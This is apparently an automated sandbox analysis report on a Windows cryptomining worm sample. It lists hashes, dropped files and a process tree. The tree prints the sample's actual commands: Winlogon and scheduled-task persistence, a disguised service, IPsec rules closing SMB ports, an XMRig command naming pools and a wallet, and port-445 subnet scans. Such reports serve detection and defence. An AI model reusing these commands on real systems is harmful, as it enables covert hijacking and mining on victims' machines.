Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
07-05-2021 13:06
Behavioral task
behavioral1
Sample
aa.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
aa.exe
Resource
win10v20210410
General
-
Target
aa.exe
-
Size
28.1MB
-
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf
-
SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790
-
SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
-
SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
TJZPFV.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\uuJCw\\TJZPFV.exe" TJZPFV.exe -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 7 IoCs
Processes:
resource yara_rule \Windows\uuJCw\TJZPFV.exe xmrig \Windows\uuJCw\TJZPFV.exe xmrig C:\Windows\uuJCw\TJZPFV.exe xmrig C:\Windows\uuJCw\TJZPFV.exe xmrig \Windows\uuJCw\Ys.exe xmrig C:\Windows\uuJCw\Ys.exe xmrig \Windows\uuJCw\Ys.exe xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
TJZPFV.exeYs.exesvchost.exesvchost.exepid process 1772 TJZPFV.exe 1620 Ys.exe 2116 svchost.exe 2192 svchost.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1724 cmd.exe -
Loads dropped DLL 8 IoCs
Processes:
aa.exeTJZPFV.execmd.execmd.exepid process 1996 aa.exe 1996 aa.exe 1772 TJZPFV.exe 1600 2084 cmd.exe 2084 cmd.exe 2156 cmd.exe 2156 cmd.exe -
Drops file in Windows directory 64 IoCs
Processes:
TJZPFV.exeaa.exesvchost.exedescription ioc process File created C:\Windows\uuJCw\etchCore-0.x64.dll TJZPFV.exe File created C:\Windows\uuJCw\exma-1.dll TJZPFV.exe File created C:\Windows\uuJCw\pcrecpp-0.dll TJZPFV.exe File created C:\Windows\uuJCw\posh-0.dll TJZPFV.exe File created C:\Windows\uuJCw\trch-0.dll TJZPFV.exe File created C:\Windows\uuJCw\trch-1.dll TJZPFV.exe File created C:\Windows\uuJCw\xdvl-0.dll TJZPFV.exe File opened for modification C:\Windows\uuJCw\HOST TJZPFV.exe File created C:\Windows\boy.exe aa.exe File created C:\Windows\uuJCw\Cstr.fb TJZPFV.exe File created C:\Windows\uuJCw\Cstr.xml TJZPFV.exe File created C:\Windows\uuJCw\pcre-0.dll TJZPFV.exe File created C:\Windows\uuJCw\Ys.exe TJZPFV.exe File created C:\Windows\uuJCw\riar.dll TJZPFV.exe File created C:\Windows\uuJCw\trfo-2.dll TJZPFV.exe File created C:\Windows\uuJCw\ucl.dll TJZPFV.exe File created C:\Windows\uuJCw\TJZPFV.exe aa.exe File created C:\Windows\uuJCw\eteb-2.dll TJZPFV.exe File created C:\Windows\uuJCw\libeay32.dll TJZPFV.exe File created C:\Windows\uuJCw\tucl.dll TJZPFV.exe File opened for modification C:\Windows\uuJCw\s.bat TJZPFV.exe File created C:\Windows\uuJCw\qdx.bat TJZPFV.exe File created C:\Windows\uuJCw\crli-0.dll TJZPFV.exe File created C:\Windows\uuJCw\esco-0.dll TJZPFV.exe File created C:\Windows\uuJCw\libxml2.dll TJZPFV.exe File created C:\Windows\uuJCw\zlib1.dll TJZPFV.exe File opened for modification C:\Windows\uuJCw\Result.txt svchost.exe File created C:\Windows\uuJCw\Cstr.exe TJZPFV.exe File created C:\Windows\uuJCw\dmgd-1.dll TJZPFV.exe File created C:\Windows\uuJCw\pcla-0.dll TJZPFV.exe File created C:\Windows\uuJCw\trfo-0.dll TJZPFV.exe File created C:\Windows\uuJCw\svchost.exe TJZPFV.exe File created C:\Windows\uuJCw\tibe.dll TJZPFV.exe File created C:\Windows\uuJCw\tibe-1.dll TJZPFV.exe File created C:\Windows\uuJCw\trfo.dll TJZPFV.exe File created C:\Windows\uuJCw\tucl-1.dll TJZPFV.exe File created C:\Windows\uuJCw\etchCore-0.x86.dll TJZPFV.exe File opened for modification C:\Windows\uuJCw\tscl.html TJZPFV.exe File created C:\Windows\uuJCw\chrome..xml TJZPFV.exe File created C:\Windows\uuJCw\libcurl.dll TJZPFV.exe File created C:\Windows\uuJCw\libiconv-2.dll TJZPFV.exe File created C:\Windows\uuJCw\chrome..exe TJZPFV.exe File created C:\Windows\uuJCw\cnli-0.dll TJZPFV.exe File created C:\Windows\uuJCw\coli-0.dll TJZPFV.exe File created C:\Windows\uuJCw\etebCore-2.x64.dll TJZPFV.exe File created C:\Windows\uuJCw\tscl.html aa.exe File created C:\Windows\uuJCw\cnli-1.dll TJZPFV.exe File created C:\Windows\uuJCw\ssleay32.dll TJZPFV.exe File created C:\Windows\uuJCw\TFf TJZPFV.exe File opened for modification C:\Windows\uuJCw\svchost.exe TJZPFV.exe File opened for modification C:\Windows\end.bat TJZPFV.exe File created C:\Windows\uuJCw\etch-0.dll TJZPFV.exe File created C:\Windows\uuJCw\riar-2.dll TJZPFV.exe File created C:\Windows\uuJCw\ip.dll TJZPFV.exe File created C:\Windows\uuJCw\etebCore-2.x86.dll TJZPFV.exe File created C:\Windows\uuJCw\pcreposix-0.dll TJZPFV.exe File created C:\Windows\uuJCw\posh.dll TJZPFV.exe File created C:\Windows\uuJCw\trch.dll TJZPFV.exe File created C:\Windows\uuJCw\iconv.dll TJZPFV.exe File created C:\Windows\uuJCw\zibe.dll TJZPFV.exe File created C:\Windows\end.bat TJZPFV.exe File created C:\Windows\uuJCw\chrome..fb TJZPFV.exe File created C:\Windows\uuJCw\adfw.dll TJZPFV.exe File created C:\Windows\uuJCw\exma.dll TJZPFV.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
TJZPFV.exepid process 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe 1772 TJZPFV.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Ys.exedescription pid process Token: SeLockMemoryPrivilege 1620 Ys.exe Token: SeLockMemoryPrivilege 1620 Ys.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
aa.exeTJZPFV.exepid process 1996 aa.exe 1996 aa.exe 1772 TJZPFV.exe 1772 TJZPFV.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aa.exeTJZPFV.execmd.execmd.execmd.exedescription pid process target process PID 1996 wrote to memory of 1772 1996 aa.exe TJZPFV.exe PID 1996 wrote to memory of 1772 1996 aa.exe TJZPFV.exe PID 1996 wrote to memory of 1772 1996 aa.exe TJZPFV.exe PID 1996 wrote to memory of 1772 1996 aa.exe TJZPFV.exe PID 1996 wrote to memory of 1724 1996 aa.exe cmd.exe PID 1996 wrote to memory of 1724 1996 aa.exe cmd.exe PID 1996 wrote to memory of 1724 1996 aa.exe cmd.exe PID 1996 wrote to memory of 1724 1996 aa.exe cmd.exe PID 1772 wrote to memory of 1104 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 1104 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 1104 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 1104 1772 TJZPFV.exe cmd.exe PID 1104 wrote to memory of 272 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 272 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 272 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 272 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1392 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1392 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1392 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1392 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1588 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1588 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1588 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1588 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1296 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1296 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1296 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1296 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1624 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1624 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1624 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1624 1104 cmd.exe netsh.exe PID 1772 wrote to memory of 336 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 336 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 336 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 336 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 328 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 328 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 328 1772 TJZPFV.exe cmd.exe PID 1772 wrote to memory of 328 1772 TJZPFV.exe cmd.exe PID 328 wrote to memory of 292 328 cmd.exe netsh.exe PID 328 wrote to memory of 292 328 cmd.exe netsh.exe PID 328 wrote to memory of 292 328 cmd.exe netsh.exe PID 328 wrote to memory of 292 328 cmd.exe netsh.exe PID 336 wrote to memory of 1592 336 cmd.exe netsh.exe PID 336 wrote to memory of 1592 336 cmd.exe netsh.exe PID 336 wrote to memory of 1592 336 cmd.exe netsh.exe PID 336 wrote to memory of 1592 336 cmd.exe netsh.exe PID 1104 wrote to memory of 1608 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1608 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1608 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1608 1104 cmd.exe netsh.exe PID 336 wrote to memory of 968 336 cmd.exe netsh.exe PID 336 wrote to memory of 968 336 cmd.exe netsh.exe PID 336 wrote to memory of 968 336 cmd.exe netsh.exe PID 336 wrote to memory of 968 336 cmd.exe netsh.exe PID 328 wrote to memory of 1328 328 cmd.exe netsh.exe PID 328 wrote to memory of 1328 328 cmd.exe netsh.exe PID 328 wrote to memory of 1328 328 cmd.exe netsh.exe PID 328 wrote to memory of 1328 328 cmd.exe netsh.exe PID 1104 wrote to memory of 1632 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1632 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1632 1104 cmd.exe netsh.exe PID 1104 wrote to memory of 1632 1104 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa.exe"C:\Users\Admin\AppData\Local\Temp\aa.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\uuJCw\TJZPFV.exeC:\Windows\uuJCw\TJZPFV.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exesc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\uuJCw\qdx.bat" "3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\uuJCw\TJZPFV.exe" /SC ONSTART4⤵
- Creates scheduled task(s)
-
C:\Windows\uuJCw\Ys.exe"C:\Windows\uuJCw\Ys.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\uuJCw\s.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\uuJCw\svchost.exesvchost.exe syn 10.7.0.0 10.7.255.255 445 /save4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\uuJCw\s.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\uuJCw\svchost.exesvchost.exe tcp 10.7.0.0 10.7.255.255 445 450 /save4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"2⤵
- Deletes itself
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-734435346-39989641855249382-1063396119-2998157751948519609179847362-1302738693"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\end.batMD5
c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\end.batMD5
c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
C:\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
C:\Windows\uuJCw\Ys.exeMD5
90f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
C:\Windows\uuJCw\qdx.batMD5
6e6a9139b684e136645639df74e75a4d
SHA1fafd5218df29e76c072ef9a3b07ca4a3644c6e56
SHA2569bc3a01fbc6452bac705925088c382fedf77735d7487a7def70ee8c2e13dcbf1
SHA512e3ac2e111b51e76c0eaeb1f93068be94c5544367529dcd843a03a029a25f840841e17bc99cb6dfd2b2f9ffa1bee7e1c2527cbf3a226a3c52a0853b0150f5886e
-
C:\Windows\uuJCw\s.batMD5
b8cacebcbb7894a1de059fe140de994b
SHA109de54c289a3686c08592e3bf452c87c4e293cca
SHA256a34520d5c0b68882195b432a9569322afd106b88873388580e0fc19e4e8c2f4b
SHA5122cbe04a3d80c9f1ffc85e5208f1ee475b29d3f21de41577dbd048ec27325b86e3ccf4f350634cf9119932353a570056d737b349abfcf35afe449982b2b2e9e35
-
C:\Windows\uuJCw\s.batMD5
9a4d0d81da0d64cacc5309ed15e8279c
SHA17cbdfda92416904d615ebcee72069b747d7660b9
SHA256ae9ad8ef7ec8cc2fb24110be8955dacb57b0cf2d7970d7975b7b471065e169e8
SHA512e47720421bed83755ba0e28dfd503a08c14ec02ee15b897391fab74491ef5d3ec7b675fdf0c29e4230c8251a4a582335e3be6e2325f1f20fc58c0a6bc52c7115
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\tscl.htmlMD5
a6dacfa9348a440ca548521adb203fc8
SHA130fbc2dc87c76aa9fafe50bffee4b75b409848bf
SHA2561a017f645e6b058cffbd4e75e745915bd30d78b58bf7cae18efd654f53613b93
SHA512e2b8b0c3f3157a4df70efc4ec444e039b03f3041d697e8b600487df35b428c2467c0ccc132c4cc6b2accb9734dd948c701a468415b12a11dda8aacfa7a9ab08c
-
\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
\Windows\uuJCw\Ys.exeMD5
90f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
\Windows\uuJCw\Ys.exeMD5
90f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
memory/268-100-0x0000000000000000-mapping.dmp
-
memory/272-69-0x0000000000000000-mapping.dmp
-
memory/292-82-0x0000000000000000-mapping.dmp
-
memory/328-80-0x0000000000000000-mapping.dmp
-
memory/336-79-0x0000000000000000-mapping.dmp
-
memory/360-134-0x0000000000000000-mapping.dmp
-
memory/528-122-0x0000000000000000-mapping.dmp
-
memory/844-130-0x0000000000000000-mapping.dmp
-
memory/876-124-0x0000000000000000-mapping.dmp
-
memory/968-106-0x0000000000000000-mapping.dmp
-
memory/968-88-0x0000000000000000-mapping.dmp
-
memory/1104-67-0x0000000000000000-mapping.dmp
-
memory/1272-110-0x0000000000000000-mapping.dmp
-
memory/1296-94-0x0000000000000000-mapping.dmp
-
memory/1296-75-0x0000000000000000-mapping.dmp
-
memory/1304-127-0x0000000000000000-mapping.dmp
-
memory/1328-90-0x0000000000000000-mapping.dmp
-
memory/1372-108-0x0000000000000000-mapping.dmp
-
memory/1392-114-0x0000000000000000-mapping.dmp
-
memory/1392-71-0x0000000000000000-mapping.dmp
-
memory/1588-73-0x0000000000000000-mapping.dmp
-
memory/1592-112-0x0000000000000000-mapping.dmp
-
memory/1592-83-0x0000000000000000-mapping.dmp
-
memory/1608-86-0x0000000000000000-mapping.dmp
-
memory/1620-144-0x00000000026A0000-0x00000000026C0000-memory.dmpFilesize
128KB
-
memory/1620-143-0x0000000002680000-0x00000000026A0000-memory.dmpFilesize
128KB
-
memory/1620-142-0x0000000000290000-0x00000000002A4000-memory.dmpFilesize
80KB
-
memory/1620-139-0x0000000000000000-mapping.dmp
-
memory/1624-77-0x0000000000000000-mapping.dmp
-
